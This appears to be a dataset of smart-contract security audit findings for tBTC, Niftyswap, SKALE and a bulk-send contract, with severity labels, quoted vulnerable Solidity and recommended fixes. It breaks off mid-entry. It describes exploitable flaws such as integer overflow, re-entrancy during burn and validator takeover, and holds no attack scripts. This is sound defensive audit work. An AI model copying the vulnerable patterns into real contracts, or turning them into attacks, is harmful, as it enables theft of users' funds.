DepositFactory,low,"`DepositFactory` inherits from `TBTCSystemAuthority`. Both contracts declare a state variable with the same name, `tbtcSystem`.\\n```\\naddress public tbtcSystem;\\n```\\n",Remove the shadowed variable.,,```\\naddress public tbtcSystem;\\n```\\n +tbtc - Values may contain dirty lower-order bits Pending,low,"`FundingScript` and `RedemptionScript` use `mload` to cast the first bytes of a byte array to `bytes4`. Because `mload` deals with 32-byte chunks, the resulting `bytes4` value may contain dirty lower-order bits.\\nFundingScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n ""Bad \\_extraData signature. Call must be to unqualifiedDepositToTbtc.""\\n);\\n```\\n\\nRedemptionScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to tbtcToBtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.tbtcToBtc.selector,\\n ""Bad \\_extraData signature. Call must be to tbtcToBtc.""\\n);\\n```\\n","Solidity truncates these unneeded bytes in the subsequent comparison operations, so there is no action required. However, this is good to keep in mind if these values are ever used for anything outside of strict comparison.",,"```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n ""Bad \\_extraData signature. Call must be to unqualifiedDepositToTbtc.""\\n);\\n```\\n" +tbtc - Revert error string may be malformed Pending,low,"`FundingScript` handles an error from a call to `VendingMachine` like so.\\n```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n\\nOn a high-level revert, `returnData` will already include the typical “error selector”. As `FundingScript` propagates this error message, it will add another error selector, which may make it difficult to read the error message.\\nThe same issue is present in RedemptionScript:\\n```\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\_extraData);\\n// By default, `address.call` will catch any revert messages.\\n// Converting the `returnData` to a string will effectively forward any revert messages.\\n// https://ethereum.stackexchange.com/questions/69133/forward-revert-message-from-low-level-solidity-call\\n// TODO: there's some noisy couple bytes at the beginning of the converted string, maybe the ABI-coded length?\\nrequire(success, string(returnData));\\n```\\n","Rather than adding an assembly-level revert to the affected contracts, ensure nested error selectors are handled in external libraries.",,"```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n" +"tbtc - Where possible, use constant rather than state variables",low,"`TBTCSystem` uses a state variable for `pausedDuration`, but this value is never changed.\\n```\\nuint256 pausedDuration = 10 days;\\n```\\n",Consider using the `constant` keyword.,,```\\nuint256 pausedDuration = 10 days;\\n```\\n +tbtc - Variable shadowing in TBTCDepositToken constructor,low,"`TBTCDepositToken` inherits from `DepositFactoryAuthority`, which has a single state variable, `_depositFactory`. This variable is shadowed in the `TBTCDepositToken` constructor.\\n```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(""tBTC Deopsit Token"", ""TDT"")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\n",Rename the parameter or state variable.,,"```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(""tBTC Deopsit Token"", ""TDT"")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\n" +Incorrect response from price feed if called during an onERC1155Received callback Acknowledged,medium,"The ERC 1155 standard requires that smart contracts must implement `onERC1155Received` and `onERC1155BatchReceived` to accept transfers.\\nThis means that on any token received, code run on the receiving smart contract.\\nIn `NiftyswapExchange` when adding / removing liquidity or buying tokens, the methods mentioned above are called when the tokens are sent. When this happens, the state of the contract is changed but not completed, the tokens are sent to the receiving smart contract but the state is not completely updated.\\nThis happens in these cases\\n`_baseToToken` (when buying tokens)\\n```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, """");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, """");\\n```\\n\\n`_removeLiquidity`\\n```\\n// Transfer total Base Tokens and all Tokens ids\\nbaseToken.safeTransferFrom(address(this), \\_provider, baseTokenID, totalBaseTokens, """");\\ntoken.safeBatchTransferFrom(address(this), \\_provider, \\_tokenIds, tokenAmounts, """");\\n```\\n\\n`_addLiquidity`\\n```\\n// Mint liquidity pool tokens\\n\\_batchMint(\\_provider, \\_tokenIds, liquiditiesToMint, """");\\n\\n// Transfer all Base Tokens to this contract\\nbaseToken.safeTransferFrom(\\_provider, address(this), baseTokenID, totalBaseTokens, abi.encode(DEPOSIT\\_SIG));\\n```\\n\\nEach of these examples send some tokens to the smart contract, which triggers calling some code on the receiving smart contract.\\nWhile these methods have the `nonReentrant` modifier which protects them from re-netrancy, the result of the methods `getPrice_baseToToken` and `getPrice_tokenToBase` is affected. These 2 methods do not have the `nonReentrant` modifier.\\nThe price reported by the `getPrice_baseToToken` and `getPrice_tokenToBase` methods is incorrect (until after the end of the transaction) because they rely on the number of tokens owned by the NiftyswapExchange; which between the calls is not finalized. Hence the price reported will be incorrect.\\nThis gives the smart contract which receives the tokens, the opportunity to use other systems (if they exist) that rely on the result of `getPrice_baseToToken` and `getPrice_tokenToBase` to use the returned price to its advantage.\\nIt's important to note that this is a bug only if other systems rely on the price reported by this `NiftyswapExchange`. Also the current contract is not affected, nor its balances or internal ledger, only other systems relying on its reported price will be fooled.","Resolution\\nThe design will not be modified. Horizon Games should clearly document this risk for 3rd parties seeking to use Niftyswap as a price feed.\\nBecause there is no way to enforce how other systems work, a restriction can be added on `NiftyswapExchange` to protect other systems (if any) that rely on `NiftyswapExchange` for price discovery.\\nAdding a `nonReentrant` modifier on the view methods `getPrice_baseToToken` and `getPrice_tokenToBase` will add a bit of protection for the ecosystem.",,"```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, """");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, """");\\n```\\n" +Ether send function remainder handling,low,"The Ether send function depicted below implements logic to reimburse the sender if an extraneous amount is left in the contract after the disbursement.\\n```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n\\nIt is also the only place where the `SafeMath` dependency is being used. More specifically to check there was no underflow in the arithmetic adding up the disbursed amounts.\\nHowever, since the individual sends would revert themselves should more Ether than what was available in the balance be specified these protection measures seem unnecessary.\\nNot only the above is true but the current codebase does not allow to take funds locked within the contract out in the off chance someone forced funds into this smart contract (e.g., by self-destructing some other smart contract containing funds into this one).","The easiest way to handle both retiring `SafeMath` and returning locked funds would be to phase out all the intra-function arithmetic and just transferring `address(this).balance` to `msg.sender` at the end of the disbursement. Since all the funds in there are meant to be from the caller of the function this serves the purpose of returning extraneous funds to him well and, adding to that, it allows for some front-running fun if someone “self-destructed” funds to this smart contract by mistake.",,"```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n" +Unneeded type cast of contract type,low,The typecast being done on the `address` parameter in the lien below is unneeded.\\n```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\n,"Assign the right type at the function parameter definition like so:\\n```\\n function sendErc20(ERC20 _tokenAddress, address[] memory _to, uint256[] memory _value) public restrictedToOwner returns (bool _success) {\\n```\\n",,```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\n +Inadequate use of assert,low,"The usage of `require` vs `assert` has always been a matter of discussion because of the fine lines distinguishing these transaction-terminating expressions.\\nHowever, the usage of the `assert` syntax in this case is not the most appropriate.\\nBorrowing the explanation from the latest solidity docs (v. https://solidity.readthedocs.io/en/latest/control-structures.html#id4) :\\n```\\nThe assert function should only be used to test for internal errors, and to check invariants. \\n```\\n\\nSince assert-style exceptions (using the `0xfe` opcode) consume all gas available to the call and require-style ones (using the `0xfd` opcode) do not since the Metropolis release when the `REVERT` instruction was added, the usage of `require` in the lines depicted in the examples section would only result in gas savings and the same security assumptions.\\nIn this case, even though the calls are being made to external contracts the supposedly abide to a predefined specification, this is by no means an invariant of the presented system since the component is external to the built system and its integrity cannot be formally verified.\\n```\\nassert(\\_to[i].send(\\_value[i]));\\n```\\n\\n```\\nassert(msg.sender.send(remainingValue));\\n```\\n\\n```\\nassert(token.transferFrom(msg.sender, \\_to[i], \\_value[i]) == true);\\n```\\n",Exchange the `assert` statements for `require` ones.,,"```\\nThe assert function should only be used to test for internal errors, and to check invariants. \\n```\\n" +uint overflow may lead to stealing funds,high,"It's possible to create a delegation with a very huge amount which may result in a lot of critically bad malicious usages:\\n```\\nuint holderBalance = SkaleToken(contractManager.getContract(""SkaleToken"")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, ""Delegator hasn't enough tokens to delegate"");\\n```\\n\\n`amount` is passed by a user as a parameter, so if it's close to `uint` max value, `amount` + lockedToDelegate would overflow and this requirement would pass.\\nHaving delegation with an almost infinite amount of tokens can lead to many various attacks on the system up to stealing funds and breaking everything.","Using `SafeMath` everywhere should prevent this and other similar issues. There should be more critical attacks caused by overflows/underflows, so `SafeMath` should be used everywhere in the codebase.",,"```\\nuint holderBalance = SkaleToken(contractManager.getContract(""SkaleToken"")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, ""Delegator hasn't enough tokens to delegate"");\\n```\\n" +Holders can burn locked funds,high,"Skale token is a modified ERC-777 that allows locking some part of the balance. Locking is checked during every transfer:\\n```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, ""Token should be unlocked for transferring"");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n\\nBut it's not checked during `burn` function and it's possible to “burn” `locked` tokens. Tokens will be burned, but `locked` amount will remain the same. That will result in having more `locked` tokens than the balance which may have very unpredictable behaviour.",Allow burning only unlocked tokens.,,"```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, ""Token should be unlocked for transferring"");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n" +Node can unlink validator,high,"Validators can link a node address to them by calling `linkNodeAddress` function:\\n```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, ""Validator cannot override node address"");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, ""Validator hasn't permissions to unlink node"");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n\\nAfter that, the node has the same rights and is almost indistinguishable from the validator. So the node can even remove validator's address from `_validatorAddressToId` list and take over full control over validator. Additionally, the node can even remove itself by calling `unlinkNodeAddress`, leaving validator with no control at all forever.\\nAlso, even without nodes, a validator can initially call `unlinkNodeAddress` to remove itself.",Linked nodes (and validator) should not be able to unlink validator's address from the `_validatorAddressToId` mapping.,,"```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, ""Validator cannot override node address"");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, ""Validator hasn't permissions to unlink node"");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n" +Unlocking funds after slashing,high,"The initial funds can be unlocked if 51+% of them are delegated. However if any portion of the funds are slashed, the rest of the funds will not be unlocked at the end of the delegation period.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\n","Consider slashed tokens as delegated, or include them in the calculation for process to unlock in `endingDelegatedToUnlocked`",,```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\n +Bounties and fees should only be locked for the first 3 months,high,"Bounties are currently locked for the first 3 months after delegation:\\n```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n\\nInstead, they should be locked for the first 3 months after the token launch.","It's better just to forbid any withdrawals for the first 3 months, no need to track it separately for every delegation. This recommendation is mainly to simplify the process.",,"```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n" +getLockedCount is iterating over all history of delegations,high,"`getLockedCount` is iterating over all delegations of a specific holder and may even change the state of these delegations by calling `getState`.\\n```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n\\nThis problem is major because delegations number is growing over time and may even potentially grow more than the gas limit and lock all tokens forever. `getLockedCount` is called during every transfer which makes any token transfer much more expensive than it should be.",Remove iterations over a potentially unlimited amount of tokens. All the necessary data can be precalculated before and `getLockedCount` function can have O(1) complexity.,,"```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n" +Tokens are unlocked only when delegation ends,high,"After the first 3 months since at least 50% of tokens are delegated, all tokens should be unlocked. In practice, they are only unlocked if at least 50% of tokens, that were bought on the initial launch, are undelegated.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n",Implement lock mechanism according to the legal requirement.,,```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n +Tokens after delegation should not be unlocked automatically,high,"When some amount of tokens are delegated to a validator when the delegation period ends, these tokens are unlocked. However these tokens should be added to `_purchased` as they were in that state before their delegation.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n","Tokens should only be unlocked if the main legal requirement `(_totalDelegated[holder] >= _purchased[holder])` is satisfied, which in the above case this has not happened.",,```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n +Some unlocked tokens can become locked after delegation is rejected,high,"When some amount of tokens are requested to be delegated to a validator, the validator can reject the request. The previous status of these tokens should be intact and not changed (locked or unlocked).\\nHere the initial status of tokens gets stored and it's either completely `locked` or unlocked:\\n```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n\\nThe problem is that if some amount of these tokens are locked at the time of the request and the rest tokens are unlocked, they will all be considered as locked after the delegation was rejected.\\n```\\nfunction \\_cancel(uint delegationId, DelegationController.Delegation memory delegation) internal returns (State state) {\\n if (\\_isPurchased[delegationId]) {\\n state = purchasedProposedToPurchased(delegationId, delegation);\\n } else {\\n state = proposedToUnlocked(delegationId);\\n }\\n}\\n```\\n",Don't change the status of the rejected tokens.,,```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n +Gas limit for bounty and slashing distribution,high,"After every bounty payment (should be once per month) to a validator, the bounty is distributed to all delegators. In order to do that, there is a `for` loop that iterates over all active delegators and sends their bounty to `SkaleBalances` contract:\\n```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n\\nThere are also few more loops over all the active delegators. This leads to a huge gas cost of distribution mechanism. A number of active delegators that can be processed before hitting the gas limit is limited and not big enough.\\nThe same issue is with slashing:\\n```\\nfunction slash(uint validatorId, uint amount) external allow(""SkaleDKG"") {\\n ValidatorService validatorService = ValidatorService(contractManager.getContract(""ValidatorService""));\\n require(validatorService.validatorExists(validatorId), ""Validator does not exist"");\\n\\n Distributor distributor = Distributor(contractManager.getContract(""Distributor""));\\n TokenState tokenState = TokenState(contractManager.getContract(""TokenState""));\\n\\n Distributor.Share[] memory shares = distributor.distributePenalties(validatorId, amount);\\n for (uint i = 0; i < shares.length; ++i) {\\n tokenState.slash(shares[i].delegationId, shares[i].amount);\\n }\\n}\\n```\\n","The best solution would require major changes to the codebase, but would eventually make it simpler and safer. Instead of distributing and centrally calculating bounty for each delegator during one call it's better to just store all the necessary values, so delegator would be able to calculate the bounty on withdrawal. Amongst the necessary values, there should be history of total delegated amounts per validator during each bounty payment and history of all delegations with durations of their active state.",,"```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n" +Delegations might stuck in non-active validator Pending,medium,"If a validator does not get enough funds to run a node (MSR - Minimum staking requirement), all token holders that delegated tokens to the validator cannot switch to a different validator, and might result in funds getting stuck with the nonfunctioning validator for up to 12 months.\\nExample\\n```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, ""Validator has to meet Minimum Staking Requirement"");\\n```\\n",Resolution\\nSkale team acknowledged this issue and will address this in future versions.\\nAllow token holders to withdraw delegation earlier if the validator didn't get enough funds for running nodes.,,"```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, ""Validator has to meet Minimum Staking Requirement"");\\n```\\n" +Disabled Validators still have delegated funds Pending,medium,"The owner of `ValidatorService` contract can enable and disable validators. The issue is that when a validator is disabled, it still has its delegations, and delegated funds will be locked until the end of their delegation period (up to 12 months).\\n```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\n","It might make sense to release all delegations and stop validator's nodes if it's not trusted anymore. However, the rationale behind disabling the validators might be different that what we think, in any case there should be a way to handle this scenario, where the validator is disabled but there are funds delegated to it.",,```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\n +_endingDelegations list is redundant,medium,"`_endingDelegations` is a list of delegations that is created for optimisation purposes. But the only place it's used is in `getPurchasedAmount` function, so only a subset of all delegations is going to be updated.\\n```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n\\nBut `getPurchasedAmount` function is mostly used after iterating over all delegations of the holder.",Resolution\\nIssue is fixed as a part of the major code changes in skalenetwork/skale-manager#92\\nRemove `_endingDelegations` and switch to a mechanism that does not require looping through delegations list of potentially unlimited size.,,```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n +Some functions are defined but not implemented,medium,"There are many functions that are defined but not implemented. They have a revert with a message as not implemented.\\nThis results in complex code and reduces readability. Here is a some of these functions within the scope of this audit:\\n```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(""Not implemented"");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(""Not implemented"");\\n}\\n```\\n","If these functions are needed for this release, they must be implemented. If they are for future plan, it's better to remove the extra code in the smart contracts.",,"```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(""Not implemented"");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(""Not implemented"");\\n}\\n```\\n" +tokenState.setState redundant checks,medium,"`tokenState.setState` is used to change the state of the token from:\\nPROPOSED to ACCEPTED (in accept())\\nDELEGATED to ENDING_DELEGATED (in `requestUndelegation()`\\nThe if/else statement in `setState` is too complicated and can be simplified, both to optimize gas usage and to increase readability.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(""TimeHelpers""));\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n\\n require(newState != State.PROPOSED, ""Can't set state to proposed"");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = getState(delegationId);\\n require(currentState == State.PROPOSED, ""Can't set state to accepted"");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(""Can't set state to delegated"");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, ""Can't set state to ending delegated"");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(""Unknown state"");\\n }\\n}\\n```\\n","Some of the changes that do not change the functionality of the `setState` function:\\nRemove `reverts()` and add the valid states to the `require()` at the beginning of the function\\nRemove multiple calls to `getState()`\\nRemove final else/revert as this is an internal function and States passed should be valid More optimization can be done which requires further understanding of the system and the state machine.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(""TimeHelpers""));\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n\\n require(newState != State.PROPOSED || newState != State.DELEGATED, ""Invalid state change"");\\n State currentState = getState(delegationId);\\n\\n if (newState == State.ACCEPTED) {\\n require(currentState == State.PROPOSED, ""Can't set state to accepted"");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(currentState == State.DELEGATED, ""Can't set state to ending delegated"");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n }\\n }\\n```\\n",,"```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(""TimeHelpers""));\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n\\n require(newState != State.PROPOSED, ""Can't set state to proposed"");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = getState(delegationId);\\n require(currentState == State.PROPOSED, ""Can't set state to accepted"");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(""Can't set state to delegated"");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, ""Can't set state to ending delegated"");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(""Unknown state"");\\n }\\n}\\n```\\n" +Users can burn delegated tokens using re-entrancy attack,high,"When a user burns tokens, the following code is called:\\n```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), ""Token should be unlocked for burning"");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n\\nThere is a callback function right after the check that there are enough unlocked tokens to burn. In this callback, the user can delegate all the tokens right before burning them without breaking the code flow.","Resolution\\nMitigated in skalenetwork/skale-manager#128\\n`_callTokensToSend` should be called before checking for the unlocked amount of tokens, which is better defined as Checks-Effects-Interactions Pattern.",,"```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), ""Token should be unlocked for burning"");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n" +Rounding errors after slashing,high,"When slashing happens `_delegatedToValidator` and `_effectiveDelegatedToValidator` values are reduced.\\n```\\nfunction 